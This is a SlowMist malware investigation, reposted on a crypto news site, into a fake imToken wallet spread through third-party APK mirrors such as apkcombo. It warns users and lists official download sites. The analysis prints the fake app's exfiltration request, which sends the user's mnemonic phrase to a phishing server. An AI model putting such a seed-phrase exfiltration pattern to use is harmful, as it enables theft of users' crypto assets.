Cointime

Download App
iOS & Android

SlowMist: Investigation and Analysis of Third-party Sources of Fake Web3 Wallets

Background

Web3, which is powered by blockchain technology, is spearheading the next phase of the technological revolution, with an increasing number of individuals getting involved in this encryption wave. However, Web3 and Web2 are two distinct worlds, with the former being a dark forest that offers diverse opportunities and risks. In this regard, the wallet serves as the entryway and pass to the Web3 world.

As you explore and interact with various blockchain-related applications and websites in the Web3 world through your wallet, you’ll realize that each application on a public chain uses a wallet to “log in.” This differs from the traditional “login” method in Web2, where accounts between different applications are not interconnected. Conversely, in the Web3 world, all applications employ wallets uniformly for “log in” purposes. Furthermore, when you “connect” to a wallet, it’s not displayed as “Login with Wallet,” but instead as “Connect Wallet.” Essentially, the wallet is the sole means of accessing the Web3 world.

As the saying goes, “where there’s light, there’ll be a shadow.” In this scorching Web3 environment, wallets, as entry-level applications, have naturally become targets of the black and gray industry chain.

Due to various reasons, such as lack of support for Google Play on certain phones or network-related problems, many individuals opt to download Google Play apps from alternative sources, such as apkcombo, apkpure, and other third-party download sites. These sites often assert that their apps are downloaded from the Google Play mirror, but their actual security remains questionable.

Website Analysis

Given the numerous downloading options, let’s take a look at apkcombo as an example. Apkcombo is a third-party app market that claims to offer applications sourced mainly from other legitimate app stores. But is this really the case?

Let’s first look at the traffic volume of apkcombo:

According to the data analytics website, SimilarWeb, apkcombo website ranks:

Global Rank: 1,809Country Rank: 7,370Category Rank: 168

We can see that its influence and traffic are both very significant.

Apkcombo provides a default Chrome APK download plugin, which has over 100,000+ users:

So, returning to our focus on the wallet sector in the Web3 field, how secure are the wallet applications downloaded from these sources?

Let’s take the well-known imToken wallet as an example. Its legitimate download channel on Google Play is:

https://play.google.com/store/apps/details?id=im.token.app

Due to certain phones lacking Google Play support or network issues, numerous individuals prefer to download Google Play apps from sources other than the official platform.

The download path for the apkcombo mirror site is: https://apkcombo.com/downloader/#package=im.token.app

The image above reveals that apkcombo offers version 24.9.11, which imToken has verified to be a non-existent version. This confirmation solidifies the fact that this is currently the most widespread fraudulent version of the imToken wallet available.

As of the writing of this article, the imToken wallet’s latest version is 2.11.3, which has a comparatively high version number, potentially utilized to mask itself as the most up-to-date version.

The image below illustrates that this fraudulent wallet version on apkcombo has a substantial download count, which is most probably sourced from Google Play’s download information. In the interest of security, we deem it crucial to expose the origin of this malevolent app to discourage further downloads of this counterfeit wallet.

Meanwhile, we found similar download sites such as: uptodown. Download link: https://imtoken.br.uptodown.com/android

We discovered that on uptodown, anyone can publish apps with minimal cost, therefore making phishing attacks more accessible:

Wallet Analysis

As we have previously examined various cases of counterfeit wallets, including the one reported in “SlowMist: Fake wallet app has stolen millions of dollars from over 10,000 users” published on November 24, 2021, we will refrain from delving into further detail here.

Our analysis will specifically focus on the counterfeit wallet offered by apkcombo, version 24.9.11. During the process of creating or importing a wallet mnemonic on the startup interface, the fake wallet will transmit the mnemonic and other sensitive data to the phishing website’s server, as exemplified in the following image:

According to the reverse APK code and analysis of traffic packets, the method used to send the mnemonic is: https://api.funnel.rocks/api/trust?aid=10&wt=1&os=1&key=<助记词>

As seen in the image below, the earliest “api.funnel.rocks” certificate appeared on June 3, 2022, which is likely when the attack began:

As the saying goes, a picture is worth a thousand words, so here is a flowchart we have created:

Conclusion

Currently, this type of scam is not only active but also expanding in scope, with new victims falling prey to it every day. As users are the weakest link in the security system, they must remain vigilant, enhance their security and risk awareness, and always use official download channels and verify information from multiple sources when using wallets and exchanges. If you have downloaded a wallet from the above-mentioned mirror sites, transfer your assets immediately, uninstall the software, and verify the information through official verification channels if necessary.

To guarantee the safety of your wallet, it is crucial to exclusively use the official websites of renowned wallet applications.

  • imToken:https://token.im/
  • TokenPocket:https://www.tokenpocket.pro/
  • TronLink:https://www.tronlink.org/
  • Bitpie:https://bitpie.com/
  • MetaMask:https://metamask.io/
  • Trust Wallet:https://trustwallet.com/

Continue following the SlowMist Security Team for more Web3 security risk analysis and alerts.

Thanks to @imTokenOfficial for providing official verifiable support during the traceability process.

To protect confidentiality and privacy, this article provides only a brief overview of the issue. SlowMist advises users to increase their understanding of security, improve their capacity to recognize phishing attacks, and refrain from becoming victims of such schemes. To gain more knowledge about security, individuals can refer to the “Blockchain dark forest selfguard handbook” published by SlowMist.

Read more: https://slowmist.medium.com/slowmist-investigation-and-analysis-of-third-party-sources-of-fake-web3-wallets-dfaaf820b804

Comments

All Comments

Recommended for you

  • A Total of 37,212.18 DMD Permanently Burned Over the Past 7 Days

    July 9, 2026 — According to the latest on-chain data released by DMDAO, a total of 37,212.18 DMD has been permanently burned over the past seven calendar days through the protocol's predefined trading and wealth management burn mechanisms.

  • Whale Transfers 1,133 BTC to Coinbase Prime, Valued at $71.48 Million

    According to Onchain Lens monitoring, a whale transferred 1,133 BTC from Coinbase to Coinbase Prime through an intermediary wallet, valued at $71.48 million.

  • U.S. AI Chip Stocks Decline Before Market Open, Intel Falls Over 3%

    On July 7, U.S. AI chip stocks experienced widespread declines before the market opened. Intel dropped over 3%, while AMD, Qualcomm, and NXP fell more than 2%. TSMC, Broadcom, and Tesla decreased by over 1%, and NVIDIA declined by 0.7%.

  • China's Central Bank Increases Gold Reserves for the 20th Consecutive Month

    As of the end of June, China's gold reserves stood at 75.44 million ounces (approximately 2,346.446 tons), an increase of 480,000 ounces (about 14.93 tons) from the end of May, which reported 74.96 million ounces (approximately 2,331.52 tons). This marks the 20th consecutive month of gold accumulation.

  • China's Foreign Exchange Reserves in June at $341.6262 Billion

    On July 7, China's foreign exchange reserves for June stood at $341.6262 billion, a decrease of $26 billion from the end of May, representing a decline of 0.75%, with expectations set at $343.2 billion.

  • U.S. Storage Stocks Drop Pre-Market, SanDisk and Micron Down Over 4%

    On July 7, U.S. storage concept stocks collectively fell in pre-market trading. Western Digital dropped over 5%, SanDisk and Micron Technology fell over 4%, Seagate Technology declined over 3%, Rambus fell over 2%, and SMI fell over 1%.

  • U.S. Stocks in Optical Communication Sector Drop Pre-Market

    On July 7, stocks in the optical communication sector of the U.S. market collectively fell pre-market. Astera Labs dropped over 4%, while Marvell Technology, Credo Technology, and AXT Inc. fell more than 3%. Tower Semiconductor, MaxLinear, Corning, Applied Optoelectronics, GlobalFoundries, Lumentum, and Qorvo all declined by more than 2%. Coherent, Nokia, Amphenol, and Broadcom dropped over 1%.

  • Pre-market Decline in U.S. Storage Stocks

    In pre-market trading, U.S. storage concept stocks experienced a widespread decline, with Micron Technology falling by 4.8%, SanDisk dropping over 4%, Corning down more than 2%, and Intel decreasing by over 3%.

  • Two Departments: Support for Reinsurance Institutions to Increase Capital and Issue Supplementary Capital Tools

    On July 7, the National Financial Supervision and Administration Bureau and the Shanghai Municipal Government released several measures to accelerate the construction of the Shanghai International Reinsurance Center. Among these measures, they proposed to enhance the quality and efficiency of the reinsurance industry, support reinsurance institutions in increasing capital and expanding shares, and issuing supplementary capital tools to improve the capacity for internal capital accumulation and external capital supplementation, thereby strengthening the reinsurance industry's capabilities. The initiative aims to guide the insurance industry to focus on major national projects, strategic emerging industries, and livelihood security, consolidating insurance and reinsurance underwriting capabilities to enhance risk protection levels. It also supports reinsurance institutions in leveraging their professional technical advantages to assist the insurance industry in reducing risk.

  • Web3 data and AI company Validation Cloud completes $10 million in new round of financing

     Web3 data and AI company Validation Cloud announced a $10 million financing round from True Global Ventures. The company plans to use the funds to expand its AI products and achieve seamless access to Web3 data.